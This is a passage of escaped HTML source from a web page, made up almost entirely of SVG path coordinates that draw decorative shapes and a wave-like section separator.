1.9,2.5-.8,1.2.8.1.8.8,1.7,2.2.5,5.5,1.3,5.2.8-1.2-.2-3.9-.8-4.5-1.3,2.7,0,2.4-.9,1.1-1.7-1.6-.1.2.2.2.5-1.4-.2-2.3-.3-3.1-.4a7.85,7.85,0,0,1-1.6-.7,31.76,31.76,0,0,0-4.5-1.9c0-.6,5.5.6,5.8,0-6.4-1.2-5.1-1.5-4.9-2.1,1.1.2,2.1.4,3.2.5-2.9-.9,1.3-.5-3.8-1.9,1.4.2,2.3.3,3.1.4,2.9.7,4.9,2.9-.2,1.8,3.6,1.4,6.5,2.4,3.2,2.8,1.2.1,2.4.5,3.2.6a4.24,4.24,0,0,0,1,.1h-.1c-1.7-.8-2.1-1.4.4-1.4-5.7-1.2-3.5-1.8.3-1.4,0,.3.1.6,2.4,1,3.2-.1,4.4-.1-.7-1.6-.8.2,3.6,1.4.5,1.1a14.53,14.53,0,0,1-3.3-.9c2.4.1,1.4-.1.6-.7,4.6.9,2.7,0,5,.3-2.2-.6-4.4-.5-5.3-1.1,1-.3-2.7-1.3,1.5-1,1.7.4,2.1.8,4.5,1.3.4-.3-3.9-.9-3.5-1.2,2.8.5,2.6.2,2.9,0-3.7-1.2-1.1-1.7-6.2-3,2,.2,1.2-.3,2.8-.2-.2.2.5.5,2.3.8-4-1.3,1.1-1.4-6-2.6-.7-.6,6,.3,2.6-.7-.2.1.1.2-.9.1.1-.2-1.3-.5-1.3-.7,4.6.6-1.6-1.4,3.5-.9-4.3-.6-2.1-.8-4.5-1.3a30.26,30.26,0,0,0-5.2,1.4c-2.3-1.1-1.8-1.5-2.1-2.3C937.7,58.3,940.4,59.4,940.2,58.9Z\"></path>\n        <path d=\"M926.2,62h.3C926.3,61.9,926.1,61.9,926.2,62Z\"></path>\n        <path d=\"M913.6,49.6c1.7.1.9-.4-1-.9q-.6-.15-1.5-.3a6,6,0,0,1,1.5.5C912.9,49.1,912.2,49.1,913.6,49.6Z\"></path>\n        <path d=\"M1035.1,69.6C1041.3,70.1,1032.4,67.8,1035.1,69.6Z\"></path>\n        <path d=\"M1016,63.9c-.8.5,1.8,1.7,4.9,2.3C1017.9,65.4,1019.7,64.8,1016,63.9Z\"></path>\n        <path d=\"M958.7,54.9c3,.4,3.2.4,6.3,1,1.3-.3-6.1-1.1-5.5-1.5.6.1,1.1.1-.1-.1C955.8,54.1,960.5,55,958.7,54.9Z\"></path>\n        <path d=\"M968.6,55.7c-3.2-.6-3.8-.5-6.2-.9.3-.2,2.1-.3-1.4-.9-1.4-.1-.4.5-1.8.4,4.5.6,2.4.8,6.5,1.4C964,55,970.4,56.4,968.6,55.7Z\"></path>\n        <path d=\"M990.8,59.6c2.6.2,1.8-.5.6-.8a7.46,7.46,0,0,1-2.1-.3C992,59.3,988.1,59,990.8,59.6Z\"></path>\n        <path d=\"M928.4,46c-.7-.1-4.2-1-4.2-.7a15.58,15.58,0,0,1,3.3.8c0-.3,4.9.7,3.9.1A61.65,61.65,0,0,0,924,45C926.8,45.4,928.6,45.8,928.4,46Z\"></path>\n        <path d=\"M917.2,42.7a32.38,32.38,0,0,0-4.4-.5,8.55,8.55,0,0,0-1.6,0,5.22,5.22,0,0,1,1.6.4,24.81,24.81,0,0,0,2.8.8c-.5-.3-1.5-.7-2.4-1.1C914.9,42.5,918.4,43.2,917.2,42.7Z\"></path>\n        <path d=\"M932.9,45.2c.4-.2-3.1-1.1-3.3-.9,2.4.4.2.6,3.4,1.1,0-.3,4,.5,4,.2a21,21,0,0,1-2.2-.6C935.2,45.4,934.7,45.5,932.9,45.2Z\"></path>\n        <path d=\"M927.4,43.8a45.32,45.32,0,0,1-7.4-1.3c-.8.3-.2.5,2.5,1.2a17.9,17.9,0,0,1,4,.3,1.83,1.83,0,0,0,1.1.2C925.7,43.9,927.7,44.1,927.4,43.8Z\"></path>\n        <path d=\"M914.6,41.3c4.4.8-1,.2,2.4,1-.1-.2,2.8.3,1.9-.1C916.3,41.8,916,41.1,914.6,41.3Z\"></path>\n        <path d=\"M913,39.9h-.2c-1.3-.2-2.1-.3-2.9-.4a1.65,1.65,0,0,0-1-.2c2.6.4,1.2.6,4,1a.79.79,0,0,1,.4.1C914.8,40.4,913,40.2,913,39.9Z\"></path>\n        <path d=\"M1110,68.2a8.32,8.32,0,0,1-2.1-.3,47.53,47.53,0,0,0,5.6,1.7C1112.2,69.1,1112.9,68.8,1110,68.2Z\"></path>\n        <path d=\"M1110.9,68.2c-.6-.1-1.3-.2-1.1-.3-.1-.2,1.8.2,2,.1-2.5-.8-5.9-.7-2.9,0C1107.8,67.5,1114.3,69,1110.9,68.2Z\"></path>\n        <path d=\"M914.9,35.7c0-.3-.3-.7-1.9-1.1-.2,0-.4-.1-.6-.1.3.1.4.2.6.2.4.2.4.2,0,.2-.7,0-2.2-.3-3.4-.3a26.29,26.29,0,0,1,3.4.7A11.06,11.06,0,0,1,914.9,35.7Z\"></path>\n        <path d=\"M1108.1,64.3c-6.2-1.3,3.4-.4-2.7-1.7-1.6.5-3.4,1.2-3.8,2.3C1107.1,65.3,1102.6,63.7,1108.1,64.3Z\"></path>\n        <path d=\"M929.5,31.6c.8.2,1.3.3,1.2.4-1.8-.3-6.1-.8-3-.2C930,32.3,933.8,32.1,929.5,31.6Z\"></path>\n        <path d=\"M916.6,29.1c2.9.7-2.7.2.4.8.9-.1,1.9-.1,2.8-.2C917.1,29.4,917.6,28.8,916.6,29.1Z\"></path>\n        <path d=\"M1223.2,80.6q2.4-.75,3-1.8c-3.4-.6-1.1-.8-5.5-1.5C1227.7,79.1,1219.5,79.2,1223.2,80.6Z\"></path>\n        <path d=\"M913.1,27.8a16.64,16.64,0,0,0-2-.1,11.37,11.37,0,0,0,2,.3,19,19,0,0,1,3.2.3c.7-.1-1.6-.6-3.2-.9a6.86,6.86,0,0,0-1.2-.1c.5.1.8.1,1.2.2C914.8,27.9,914.2,27.9,913.1,27.8Z\"></path>\n        <path d=\"M1113.5,59.1c-7.1-.8,3.5,0-4.5-1.3-1.2.8-2.2.5-1.3,1.3C1111.2,59.4,1109.6,58.9,1113.5,59.1Z\"></path>\n        <path d=\"M937.1,29.3a47.91,47.91,0,0,0-6.1-.6c.7.1,4.2,1,4.2.7C931.4,28.7,937.7,29.7,937.1,29.3Z\"></path>\n        <path d=\"M1114.4,56.8a10.11,10.11,0,0,1-3-.3c.1.3,2,.7,1.4.9-3.1-.5-.5.1-4-.3,2.9.4-2.4,0,1.3.7,0-.2,3.4.5,3,.2a10.32,10.32,0,0,1-2.2-.5c1.6.2,3.9.7,4.1.6-2.9-.7,3-.3-1.5-1.1C1115.1,57.2,1116.2,57.2,1114.4,56.8Z\"></path>\n        <path d=\"M935.2,25.3c-.3.2,2,.6,1.3.8,5.2.9.4-.3,2.9,0s1.3.5,3.3.9C943.3,26.4,936.9,25.7,935.2,25.3Z\"></path>\n        <path d=\"M1109.9,53.4c4.6.7,3,.9,2.9,1.2-.5.1-.6.2-.1.4h1.3a4.42,4.42,0,0,0,.5.1c-.1,0,0-.1-.1-.1h1a10.52,10.52,0,0,1,1.1.3c0-.2.2-.3.3-.4.9-.1,1.1-.3-.3-.5-.3,0-.6.1-1,.1a11.26,11.26,0,0,1-1.4-.3c.5-.4,2.4.1,3.9.1-1.7-.2-7.2-1.6-5.4-1.1C1115.4,53.9,1111.7,53.6,1109.9,53.4Z\"></path>\n        <path d=\"M919,17.6c1.4.3,2.1.5,4.2.8,2.1,0-1.4-.8,1.7-.5C921.8,17.7,919.7,17.1,919,17.6Z\"></path>\n        <path d=\"M915.4,13.8c-.4.7,0,.7,2.6,1.4C918.8,15.4,916,13.8,915.4,13.8Z\"></path>\n        <path d=\"M930.3,16.8a43.92,43.92,0,0,0-7.3-1.1c1.9.3,6.6,1.2,7.4,1.3C929.1,16.8,929.7,16.8,930.3,16.8Z\"></path>\n        <path d=\"M921.6,10.5c3,1.2-5.7-.2-1.5,1C919.7,11,927.3,11.8,921.6,10.5Z\"></path>\n        <path d=\"M1610.4,41.7c1.3-.6-.6-.4-3.6-.6-.1-.1-.2-.1-1.1-.1.1.1.1.2.2.3C1610.6,41.1,1608.7,42.1,1610.4,41.7Z\"></path>\n        <path d=\"M1599.6,41.3c1.8,0,3.3.1,4.3.2C1604.4,41.1,1599.1,40.8,1599.6,41.3Z\"></path>\n        <path d=\"M1575.5,44.5c-.8.4,1.8,1.1,4.7.8C1575.8,45.1,1580.3,44.7,1575.5,44.5Z\"></path>\n        <path d=\"M934.8,31.5a24.37,24.37,0,0,1-2.7-.1c-1.9-.3-2.4-.6-5-1a17.39,17.39,0,0,0,3.9.9h-1.4c-.1.3,2.4.3,4.5.4C933.8,31.6,934.2,31.5,934.8,31.5Z\"></path>\n        <path d=\"M916.9,31.4c1.1,0,2.1,0,3.2.1.8-.3-3.4-.2-5.5-.3,1.1.2-.4.3-1.2.4-.1,0-.2-.1-.4-.1h-.1c0,.1.1.2.1.3s.1.2.2.3c1.6.3,2.7.6,4.3.9-1-.5,1.3-.1.8-.4-3.5-.7-.6.3-4.1-.5-.2-.1,0-.3-.4-.4H915C916.7,31.7,915.4,31.4,916.9,31.4Z\"></path>\n        <path d=\"M1598.8,48c.3.7,1.4.8.9,1.3C1603.6,49.2,1601.2,48.2,1598.8,48Z\"></path>\n        <path d=\"M1592.1,49c.7.4,0,.6-.5.9C1595,49.9,1595.8,49.1,1592.1,49Z\"></path>\n        <path d=\"M1517.1,49.7c-4.1,0-3-.5-5.7-.7.8.5.9.7,3.9,1.2C1516.3,50.1,1516.1,49.9,1517.1,49.7Z\"></path>\n        <path d=\"M1681.5,54.1c2.2-.1-.6-.7-2.6-.8C1681,53.7,1678.1,54.1,1681.5,54.1Z\"></path>\n        <path d=\"M1561.2,51.4c1.9.6-.8,1.2.2,1.9,2.6.1,5.1.1,6.3,0C1563.5,52.8,1568.4,51.8,1561.2,51.4Z\"></path>\n        <path d=\"M1514.2,54.9c.7.4-.8.9,2.8,1C1514.1,55.5,1518.7,55.1,1514.2,54.9Z\"></path>\n        <path d=\"M1488.4,55.5c5.5,0,3.5.6,7.8.7-2.8-.6-3.3-.9-2.9-1.3C1492.4,55.2,1489.3,55.2,1488.4,55.5Z\"></path>\n        <path d=\"M1568,56.9a20.32,20.32,0,0,0-4.6-.5A9.14,9.14,0,0,0,1568,56.9Z\"></path>\n        <path d=\"M1516,56c-1.7.1-.6.6,1.5.7-.1-.1,1.8-.1,2-.2C1515.4,56.6,1518.8,56.1,1516,56Z\"></path>\n        <path d=\"M1471.7,55.6c-1.4,0-2.8-.1-4.3-.1a5.58,5.58,0,0,0,2.6.8C1472.3,56.2,1472.3,55.9,1471.7,55.6Z\"></path>\n        <path d=\"M1474.6,56.8c-2-.4,3.4-.8-1.6-.9,1.4.6-.8.7-2.5.9C1472.5,56.9,1472.7,56.8,1474.6,56.8Z\"></path>\n        <path d=\"M1519.1,57.6c-2.5-.1-2.6-.3-1.4-.5-1.1,0-2.1,0-3.2-.1C1513.4,57.5,1517.5,57.9,1519.1,57.6Z\"></path>\n        <path d=\"M1570.1,58.6c.1.2-2.4.6.5.8C1570.5,59.2,1573.1,58.8,1570.1,58.6Z\"></path>\n        <path d=\"M1517.2,57.9c.4.4,1.2.7,4.7.8C1521.4,58.3,1518.7,58.2,1517.2,57.9Z\"></path>\n        <path d=\"M1418,56.7c2.3.1,2.5.3,2.5.6,1.6,0,3.9.1,4.2,0-3.3-.2-3.6-.4-1.4-.6A29.32,29.32,0,0,0,1418,56.7Z\"></path>\n        <path d=\"M1565.7,59.8c.2.6,6.9.3,7.4,0C1569.6,59.7,1569.4,60,1565.7,59.8Z\"></path>\n        <path d=\"M1514.9,59.2c5,.2,4.7.1,8.6.4,0-.1.1-.1,1-.1,0-.1-.1-.1-.1-.2C1521.7,59.2,1516.5,58.9,1514.9,59.2Z\"></path>\n        <path d=\"M1401.7,57.6c-2.5.7,13.8.6,9.6.2C1409.8,58,1403.9,57.7,1401.7,57.6Z\"></path>\n        <path d=\"M1481.8,59.7c-.5.2-1.4.2-1.8.4,2,0,2.4.2,4.3.2C1484.3,60,1484.1,59.8,1481.8,59.7Z\"></path>\n        <path d=\"M1537,60.9c-.1.5-1.2.7.7,1,.9-.2,4.6-.1,3.9-.5C1539.9,61.3,1540,61,1537,60.9Z\"></path>\n        <path d=\"M1190,54.5c.1-.2,1.6-.2,1.9-.3-5.3.1-2.5-.2-6.5-.4,2.6.5-1,.7-.2,1.3,4.2.1,11.3-.3,5.8-.8C1191.2,54.6,1190.7,54.7,1190,54.5Z\"></path>\n        <path d=\"M1516.7,61.8a8.24,8.24,0,0,0-3.6-.7C1513.7,61.4,1513.4,61.8,1516.7,61.8Z\"></path>\n        <path d=\"M1395.9,59.9c4.2.2,6.4-.3,3.8-.6C1400.2,59.7,1396.4,59.6,1395.9,59.9Z\"></path>\n        <path d=\"M1474.1,63.9c4.2-.5,8.4-1.6,4.5-2.7C1479.7,62.3,1473.1,63.1,1474.1,63.9Z\"></path>\n        <path d=\"M1355.1,60.1c-4.5,0-1.6-.7-6.7-.7,2.2.5,6.2,1.2.9,1.4,1.7.2,4.6.1,6.4.1C1353.9,60.6,1355,60.5,1355.1,60.1Z\"></path>\n        <path d=\"M1360.4,60.1h-2.1c.1.1-.8.1-.9.2,2.1.1,2.8.3,5.5.3,1.4-.4-3.7-.1-3.4-.4C1360,60.2,1360.6,60.2,1360.4,60.1Z\"></path>\n        <path d=\"M1114.1,55.5a60.9,60.9,0,0,0-7.4,0c2.8.3,2.8.6-.6.6C1112.2,56.5,1113.4,56,1114.1,55.5Z\"></path>\n        <path d=\"M1295.9,59.3c.7.2-.9.6,1.5.7C1298.2,60,1299.7,59.3,1295.9,59.3Z\"></path>\n        <path d=\"M1452.1,64c-.8-.3-1.3-.6-4.6-.6C1445.9,63.5,1448,64,1452.1,64Z\"></path>\n        <path d=\"M1451.1,64.1c-.1.4,2.6.5,3.6.7,1.9-.2-1-.3-.4-.7Z\"></path>\n        <path d=\"M1563.4,80.3c-1.6.1-.1.5,1.5.7C1565.7,80.9,1567.2,80.2,1563.4,80.3Z\"></path>\n        <path d=\"M1551,82.2c.1.5-2.5.7-3.5,1.1a23.4,23.4,0,0,0,6.2-.1c-1.2-.1-2.3-.3-3.4-.4C1552.3,82.9,1554.5,82.1,1551,82.2Z\"></path>\n        <path d=\"M1535.9,89.5h0c5.3-.1,8-.5,9.8-1-2.3-.2-4.7-.1-7.6-.4C1539.5,88.8,1533,89,1535.9,89.5Z\"></path>\n        <path d=\"M1400.3,58.5a16.38,16.38,0,0,0,2.2.3C1401.9,58.7,1401.1,58.6,1400.3,58.5Z\"></path>\n        <path d=\"M1616.7,41.6c-1.3,0-2.5,0-2,.2,6,.1,2.4-.5,1.7-.6C1615.2,41.3,1615.3,41.5,1616.7,41.6Z\"></path>\n        <path d=\"M1591.6,41.9c.2-.5,7.7-.2,2.7-.7,2.6-.1,10-.6,2.5-.9C1595.2,40.7,1590.5,41.4,1591.6,41.9Z\"></path>\n        <path d=\"M1594.6,43.3c1.8-.3.8-1.3,6.8-.8,0-.3-3.2-.3-4.5-.5-1.4,0,.1.4-1.8.4-1.3,0-1.3-.2-1.3-.4a37.36,37.36,0,0,0-4.1.1c5,0,1.3.5,4.8.9a28.68,28.68,0,0,1-5.4-.2c0-.1,1.3-.1.9-.3-4.5.2-3-.4-6.7-.6-2.1.2,1,.4,2.5.6a19.52,19.52,0,0,1-5.9.6c-.1-.2-1-.3-2.3-.4-1.1.1-3.3.2-2.8.5,2.6.1,2.2-.2,5.2,0-3.1.2,1.1.5-4,.2-.2.3-1.8.4.4.7,2.1-.1,4.2-.1,6.2-.2-1.6-.1-1.2-.3-1.4-.5,3.3.2,1.7-.2,1.8-.4h3.1c.1.3.9.6,2.6.8.5-.3,3.1-.1,4.3.1.2-.3,6.9-.3,3.7-.7A7,7,0,0,1,1594.6,43.3Z\"></path>\n        <path d=\"M1695,42.7c-1.3.4-3.1.7-7,.5,2,.1,1,.4,3.4.4,1-.2,4.2.2,5.2-.1C1691.4,43.3,1697.6,42.9,1695,42.7Z\"></path>\n        <path d=\"M1564,54.1c3.9.3,3.2,1.4,3.3.2-.3-.2-4.1-1-2.5-.6C1565,53.9,1564.8,54,1564,54.1Z\"></path>\n        <path d=\"M1473.5,55a5.11,5.11,0,0,0,2.4.5c3.8,0-3.3-1.5,4.7-.9-.3-.4-2.3-.9-1.5-.7-.7.4-2.3,0-4.3-.1C1472,54.2,1478.2,55,1473.5,55Z\"></path>\n        <path d=\"M1301.6,58.5c.2.1,1.5.2,1.3.4a7.36,7.36,0,0,0-3.1,0c1.7,0,.8.3,2.3.4C1303.9,59.1,1304,58.3,1301.6,58.5Z\"></path>\n        <path d=\"M1498.8,64.8c1.1.1,4,.1,3.4.4-.6,0-1.2.1.1.1.7-.3,1.5-.1,4.2,0,1.4-.4-3.7-.1-3.4-.4,1.8,0-1.6-.4,3-.3,2.7.1,1.8.5,4.5.5,1.7-.1-.1-.6,1.6-.7-5.3,0-3.6-1.5-10.7-2C1499.8,63.4,1501,64.2,1498.8,64.8Z\"></path>\n        <path d=\"M1492.8,65.3a18.25,18.25,0,0,1-3.3-.3c-2.4.2,1.9.3,2.5.6-.4,0-5.1.1-2,.2,1.4,0,1.4-.1,3.1,0C1493,65.4,1491.2,65.5,1492.8,65.3Z\"></path>\n        <path d=\"M1567.4,82.7c.4-.3.1-.5-3.8-.6-.2.2-.1.3,0,.5-11.8.6-10.3,2.7-18.2,3.8,3,.1,2-.2,4.1-.1,2.9.4-.3.6.7,1,3.8-.2,6.4-.5,8.9-.8,2.3.1,3.2.3,6.5.4C1570.7,85.8,1580.1,83.8,1567.4,82.7Z\"></path>\n        <path d=\"M1541.6,87c1.1.2,4.4.2,3.6.6-4.3,0-5.3-.2-6.6-.5,1,.4-1.6.3-.6.6,5.3.1,6.7-.2,10.3-.2a6.85,6.85,0,0,1-2.7-.9A15,15,0,0,0,1541.6,87Z\"></path>\n        <path d=\"M1349.4,59.4c3.9.3.4-.4,3-.3-.7.7,3.9.3,1.6.9,6.3-.1,3.7-1.3-2.1-1.6.4-.3,4.1-.7,1.5-1a12.2,12.2,0,0,1-6-1.2c1.6,0,4,.1,4.2,0-8.7-.2-4.5-1.6-8.6-1.9C1343.5,56.1,1351.5,57.7,1349.4,59.4Z\"></path>\n        <path d=\"M1448.4,72.8c1.8,0,3.5.1,5.3.1,6.1-.5-3.1-1.7,2-1.8-7.4-.3-3.4-1-8.2-1.4,2.5-.2,5.2.2,6.2-.1-1.6-.5-8.1-.6-8.2-1.3,2.1,0,1.1-.3,4.1-.1-1.7-.5-.6-.5.5-.9-7.1-.5-.5-1.9-9-2.5,2.5.9,7.8,3.1-.9,3.4a14.08,14.08,0,0,0-4.2,0c1.6.1,4.2.2,3.5.5-12.8.2-2,2.7,2.3,3.5-1,0-2.07,0-3.1,0,4.2.3,5.2.8,9.1,1.1C1449.8,73.2,1449.3,73,1448.4,72.8Z\"></path>\n        <path d=\"M1579.1,77c-1.8,0,.4.5-1.8.5s-1.5-.3-4.4-.3c.9.3-2.1.2-3,.3,2.5.7-.3.7-2.5,1,.5.2,3,.3,3.5.5-2.3.4-6.6.5-7.7,1,6.4.2,5.1-.2,11.5-.1.5-.3-.2-.8,2.6-.8-.6.4,1.3.5,3.6.6-.7-.4-.7-.8,2.7-.7C1583.3,78.2,1581.9,77.6,1579.1,77Z\"></path>\n      </svg>\n    </div>\n    <div class=\"h-separator\" style=\"height: 121px; bottom: 0px;\">\n      <svg style=\"fill:white;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.77\" preserveAspectRatio=\"xMidYMax slice\">\n        <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M571.07,60.51l-3.93-.7-.24,3,4.09-.37C571,61.82,571,61.17,571.07,60.51Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M799.31,23c-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0a12.07,12.07,0,0,0-.71,4.87,4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76C803.7,28,804.22,23.75,799.31,23Z\"\n          transform=\"translate(0 0)\"></path>\n        <path d=\"M13.9,65.4l-.6-1.25c-1.06-2.59,1-4.49,4.66-4.33,8.51-.84,17-1.62,25.52-2.54,2.1-.23,4.14-1.27,6.22-1.3A66.38,66.38,0,0,1,58,56.8l1.31-.23A7.68,7.68,0,0,1,67,54.46a3.11,3.11,0,0,0,2.58-.66,5.37,5.37,0,0,1,6.17-1.43,2,2,0,0,0,1,.2q8.63-1.38,17.24-2.8c2.43-.4,4.84-1,7.29-1.15s5.08-.07,7.63-.08l17.77,0c.67,0,1.66.31,2,0,2.76-3,5.81-1.26,8.83-.74,3.65.63,4.85-.35,5.7-3.95.24-1,1.18-2.59,1.78-2.58a4.87,4.87,0,0,1,3.17,1.67c1.67,1.9,2.95,4.14,4.57,6.09a4.51,4.51,0,0,0,2.55,1.41,24.07,24.07,0,0,0,6.73.53c6.42-.86,12.56.17,18.8,1.53,3.93.85,8.09.6,12.13,1,3.2.33,6.38.93,9.58,1.41l14,2.19c1.59-.23,3.22-.8,4.77-.64,5.65.6,11.29,1.4,16.92,2.21,1.75.25,3.44.88,5.2,1.13,3,.41,6,1.06,9,.87s5.86-.94,8.74,1.16c.81.59,3.42-.53,4.71-1.52,1.76-1.35,3-1.64,5.11-.57,2.44,1.22,5.3,1.6,8.24,2.42.28-2.43.38-4.31.76-6.12a2.21,2.21,0,0,1,1.5-1.47c.49,0,1.26.79,1.54,1.4,1.48,3.31,3.71,4.81,7.51,4.46,4.43-.41,8.85-1.07,13.27-1.57A4.73,4.73,0,0,1,306,59c5.66,2.7,11.74,3.44,17.88,3.9.11,0,.25,0,.33,0,4.79,3.34,10.15,4.24,15.85,3.8.12,0,.26.33.4.51l1.34.53,2.1,1.4,2.6-1.71c.92-.41,1.93-1.31,2.73-1.16,1.83.36,3.65.81,5.48,1.14,4.16.74,8.33.8,12.54-2.69L366,69.46l5.8-2.54,5.48-2.41c-3.7-1.64-4.16-4.87-4-8.14a5.29,5.29,0,0,1,.88-2.44c1.07,1.15,2.13,2.3,3.21,3.45,1.76.14,3.51.31,5.26.47a24.63,24.63,0,0,1,1.44,4c.35,1,.65,2,1,3a12,12,0,0,0,2.57-1.65c2.29-2.46,2.93-.14,3.93,1.23l3.46-.87c.73-1.42,1.34-2.92,2.12-4.31l3.08.31c1.89.2,3.68,1.35,5.51,2.06l24.57,3.25c.33,0,.73-.08,1,0,7.53,3.52,15.78,1,23.59,2.89,6.56,1.6,13.44,1.92,20.18,2.81q5.69.45,11.36.88c1.22.08,2.44.09,3.66.14l.78-2c0-.68.05-1.35.08-2q1.28-3.8,2.53-7.59l.94-1.85,4-3c-1.83-.66-3.78-2.12-5.41-1.83-6.92,1.23-13.43-1-20.11-1.79a88.07,88.07,0,0,1-12.06-2.33A47.15,47.15,0,0,1,484,46.55h2.76l6.75.09h1.36L507.12,48l1.32,0,19.06,2h2.06l34.16.94,1.29-.43c3.65-2.87,7.6-2.47,11.64-1.06l2.08.28,1.23-.66,6.83-3.34c.21-.26.41-.71.64-.73,3.29-.25,6.59-.45,9.89-.64.13,0,.28.31.42.47l1.27.4c2,.15,3.07-3.37,5.53-1.37,2.37.12,4.73.25,7.1.34a6.49,6.49,0,0,0,3.64-.67l4.89,2.91a45.17,45.17,0,0,1-.64-4.91c-.11-4.8-.06-4.8-4.91-5.68-2.86,1.84-4.63,1.26-6.9-1.64a35,35,0,0,0-4.6-4.14L600,33.41c-.19,1.18.12,3.44-.83,4.27-1.64,1.44-4,2-5.94,2.85-.52-2.28-.42-4-1.25-4.78-.65-.59-2.49.35-3.7.11a45.78,45.78,0,0,1-5.58-1.79c-2.06.67-4.09,1.71-6.19,1.84-.78.05-1.69-2-2.55-3.08-.84,0-2-.41-2.46,0a9.67,9.67,0,0,0-2.74,3.41c-1.11,2.69-2.92,2.32-5.24,2.08-5.1-.51-10.26-.56-16-.84.14.23-.21-.32-.52-.89-1.87-3.42-2.7-3.45-5.28-.44a4.91,4.91,0,0,1-2.4,1.38c-1.74.47-3.55.7-5.33,1l.15.91-3.69-1.58c.27-2,.49-3.68,3.37-4,1-.12,2.5-2.31,2.49-3.53,0-3.35,1.14-4.84,4.5-5.42,2.74-.48,5.26-2.07,8-2.84,3.69-1.05,7.49-1.69,11.2-2.67,8.15-2.14,16.27-4.4,24.41-6.56a7,7,0,0,1,3.33-.25c5.24,1.31,10-.23,14.91-1.84,3.07-1,6.29-1.54,9.45-2.28h2c5.23-.29,10.46-.6,15.7-.83.86,0,1.77.44,2.6.31,4.53-.71,9-1.53,13.55-2.35,1.54-.28,3.06-.67,4.87-1.06,1,3,3.55,2.85,6,2.06,8.74-2.89,17.68-3.48,26.8-2.94,6.21.37,12.45.32,18.67.68,1.39.08,2.73,1.1,4.09,1.68C709,5,711.7,2.68,714.63,5.67a1,1,0,0,0,1-.09c3.33-3.17,7.5-2.06,11.32-2,15.24.32,30.54.25,45.71,1.53,17.76,1.49,35.42,4.22,53.11,6.46a79.56,79.56,0,0,1,9,1.52,34.57,34.57,0,0,1,5.42,2.36c2.63-3.91,6.11,0,9.47.45l1.28.27c15.94,3.63,31.9,7.22,47.83,10.93,3.21.75,6.31,2,9.46,3.05l1.33.23q10.69,3.14,21.41,6.26c4.35,1.26,8.73,2.42,13.07,3.7,5.72,1.69,11.4,3.5,17.13,5.15,2.37.69,5.11.57,7.19,1.72,6.21,3.44,12.72.42,19,1.37s12.79,1.39,19.21,1.87c8,.58,16,1.29,23.93,1.35a132.33,132.33,0,0,0,17.88-1.43c1.88-.24,3.6-1.73,5.4-2.65,1.62-1.12,3.8-1.93,6-3.77,2.88-3.15,6.07-2.08,9.72-2.38,2.19-.18,4.34-.75,6.51-1.12a49.53,49.53,0,0,1,5.76-.89c2.43-.15,5-.75,7.3-.27a6.77,6.77,0,0,1,3.62,2.76,57.36,57.36,0,0,1,3.5,6.27,1.17,1.17,0,0,0,1.25.22c4.37-5,4.16-5.45,9-.47a8.74,8.74,0,0,0,5.33,2.21c5.07.32,6.5,2.41,4.33,6.9a26.08,26.08,0,0,0-1.58,4.47c-.91,3.32-.07,3.48,3.39,2.65l1.22,0,2.2,0c3.32-1.9,6.71-2.49,10.37-.87a5.91,5.91,0,0,0,2.61,0c2.11-.17,4.22-.49,6.33-.54,4-.08,8.08,0,12.12,0,7.89.08,15.79.14,23.68.32,6.09.13,12.19.29,18.27.68,7,.45,13.91,1.25,20.88,1.76,2.92.21,5.87,0,8.8.06a13.19,13.19,0,0,1,4,.24c6.31,2.22,12.79,2,19.37,2.17,10.34.27,20.68,1.3,31,2.58,3,.37,6.89-12.55,9.18-11,1.32.89,12.9,3.57,12.9,3.57s.31-8.06,15.63-1.73c.66.27,10.09-4.48,10.79-4.37.44.14,1.15,2.47,1.58,2.61,1.42.17.69-7.18,2.11-7.2,16.22-.26,15.65.29,15.23.43l4.25-1.2s8.6-5.21,12.58-5.19a7.81,7.81,0,0,1,.94-1.51,4.11,4.11,0,0,0,.46.94c.33.5,2,.15,3,.14l.12,0c2,3.77,3.14,11,3.63,4,.07-1.21.31-3.35.7-6.28,3-.77,6.13-.13,9.28.62a7.88,7.88,0,0,1,2.6.64,4.88,4.88,0,0,1,2,2.31,60.15,60.15,0,0,1,1.34,6.22c4.32-1.57,8-2,12.06-.48,2.13.78,4.92-.48,7.38-.33s4.66.92,7.54,1.54c.72-1,1.81-2.64,2.82-4.13l4.43,3.18,0,0c.25-.81.51-1.61.76-2.42,1.93.71,3.59,1.21,5.14,1.92a4.61,4.61,0,0,0,5-.26c.59-.41,2-.08,2.78.29,3.84,1.71,7.59,2.6,11.47.11a2.26,2.26,0,0,1,1.89.12c4.53,2.45,9.29,2.22,14.13,1.42a3.25,3.25,0,0,1,1.64.14c5.87,2.35,11.49.87,17.18-.85a11.57,11.57,0,0,1,5-.06c2.39.4,4.72,1.66,7.09,1.67,3.16,0,4.21,1.44,4.1,4.6,1.12-2,1.7-4,3-5.11s3.43-2,5,.87c-1.25,1.36-2.58,2.81-4.34,4.75l5.16.85c2.4-4.06,3.67-4.4,8.55-3.34,1.08.24,2.49-.73,3.68-1.29,1-.47,2.23-1.88,2.76-1.63,3.59,1.73,8.2,1.09,11,4.73.5.64,1.75.76,2.69,1,1.16.26,2.36.37,3.54.54l1.73-1c.19-.27.45-.8.55-.77,2.78.8,4.73-.29,6.38-2.48a3.27,3.27,0,0,1,2.34.91c1.38,2,2.94,2.06,5.24,1.75,3.19-.43,6.51.16,9.76,0,2.6-.09,5.18-.8,7.78-.85a38,38,0,0,1,9.55.55c2.58.62,4.75,1.12,7.47.28,2.24-.69,4.92,0,7.4.15,2.91-1.39,5.85-2.73,8.73-4.18,2.7-1.37,5.19-3.5,8.64-1.62.21-3.15,2.3-3.62,4.6-3.8,5-.54,10-1.12,15-1.55.75-.07,1.56.56,2.34.86l1.19.25c4.38-1.37,5